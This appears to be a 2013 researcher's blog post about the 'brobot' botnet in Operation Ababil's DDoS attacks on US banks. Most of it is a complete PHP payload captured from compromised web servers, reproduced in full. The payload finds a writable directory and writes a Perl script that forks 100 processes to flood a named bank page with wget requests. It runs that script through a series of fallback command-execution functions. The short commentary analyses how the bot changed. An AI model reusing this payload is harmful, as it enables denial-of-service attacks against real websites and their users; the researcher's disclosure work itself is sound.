04.03
Since 2013-04-02 T18:05 UTC, the brobot starts Attacks against the US Banks again.
He send now the following Code and execute them:
Here is one of the complete Code (he has different Codes) (new lines insert by us, to read it better):
function randomvar(){
$a=chr(rand(97,122));
$b=rtrim(base64_encode(rand(100,10000)),'=');
return $a.$b;
}
$url = "http://www.bbt.com/bbtdotcom/financial-education/home_and_residence/accumulate_down_payment.page";
$rand = md5(microtime().rand(0,500));
if(preg_match("/\?/",$url))
$url .= "&".randomvar()."=".substr($rand,0,rand(4,10));
else
$url .= "?".randomvar()."=".substr($rand,0,rand(4,10));
if(!function_exists('scandir'))
{
function scandir($a,$b=false,$c=true)
{
$d=array();
if($e=opendir($a))
{
while(false!==($f=readdir($e)))
{
if(($f!="."&&$f!="..")||$c==true)
{
if($b==false)
if(is_dir($f))
continue;
array_push($d,basename($f));
}
}
closedir($e);
}
return $d;
}
}
function on_exit()
{
echo "###Assassin###\n";
echo "\nuau-repeat";
}
if(function_exists('register_shutdown_function'))
register_shutdown_function("on_exit");
fwrite(fopen($h=tgya8siudj().'/'.md5(microtime()),'w'),
"unlink '$h';
$time=time();
for($i = 0;$i < 100;$i++)
{
if(fork())
{
}
else
{
$j=0;while(time()-$time<120)
{
$j++;
if($j % 100 == 0)
{
sleep 1;
}
system("wget -U 'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8' -t 45 --delete-after --no-check-certificate '$url' 2>&1 &\");
}
last;
}
}"
); # fwrite Ends
iyiuo("perl $h");
echo "###Assassin###";
echo "\nuau-repeat";
function iyiuo($r)
{
$s="";
if(!empty($r))
{
if(function_exists('exec'))
{
@exec($r,$s);
$s=join("\n",$s);
}
elseif(function_exists('shell_exec'))
$s=@shell_exec($r);
elseif(function_exists('system'))
{
@ob_start();
@system($r);
$s=@ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($r);
$s=@ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('popen') and @is_resource($t=@popen($r,"r")))
{
$s="";
while(!@feof($t))
$s.=@fread($t,1024);
@pclose($t);
}
elseif(function_exists('proc_open'))
{
$u=proc_open($r,array(array("pipe","r"),array("pipe","w"),array("pipe","w")),$v);
$s=stream_get_contents($v[1]);
fclose($v[0]);
fclose($v[1]);
fclose($v[2]);
proc_close($u);
}
}
return $s;
}
function gyhuijoakosdoj()
{
$j="";
if(!isset($_SERVER["DOCUMENT_ROOT"]))
$_SERVER["DOCUMENT_ROOT"]=substr($_SERVER["SCRIPT_FILENAME"],0,-strlen($_SERVER["SCRIPT_NAME"]));
$k[]=$_SERVER["DOCUMENT_ROOT"];
while($k)
{
$l=array_pop($k);
if($m=scandir($l))
{
$n=0;
while(isset($m[$n]))
{
if($m[$n]!=="."&&$m[$n]!=="..")
{
$o="{$l}/{$m[$n]}";
if(is_dir($o))
{
$k[]=$o;
if(@is_writable($o))
{
return $o;
}
}
}
$n++;
}
}
}
return false;
}
function tgya8siudj()
{
if(@is_writable('/tmp'))
return '/tmp';
elseif(@is_writable(preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME'])))
return preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME']);
elseif(!function_exists("sys_gt_temp_dir"))
{
if(!empty($_ENV["TMP"])and@is_writable($_ENV["TMP"]))
return realpath($_ENV["TMP"]);
elseif(!empty($_ENV["TMPDIR"])and@is_writable($_ENV["TMPDIR"]))
return realpath($_ENV["TMPDIR"]);
elseif(!empty($_ENV["TEMP"])and@is_writable($_ENV["TEMP"]))
return realpath($_ENV["TEMP"]);
else
{
$a=gyhuijoakosdoj();
if($a==!false)
return $a;
$p=tempnam(md5(uniqid(rand(),TRUE)),"");
if($p)
{
$q=realpath(dirname($p));
@unlink($p);
return $q;
}
else
return false;
}
}
else
return sys_get_temp_dir();
}
exit;
complete Code formated
He has now here own „scan_dir“ function, when the Function not exists or is disabled.
And he looks now to execute the ddos over exec with wget or proc_open and other functions, but not longer with fsocketopen or stream….
Are two many systems without socket support?
Update:Here is acode with socket
The Hackers have write a new Phase for „Phase3/W5 Operation Ababil“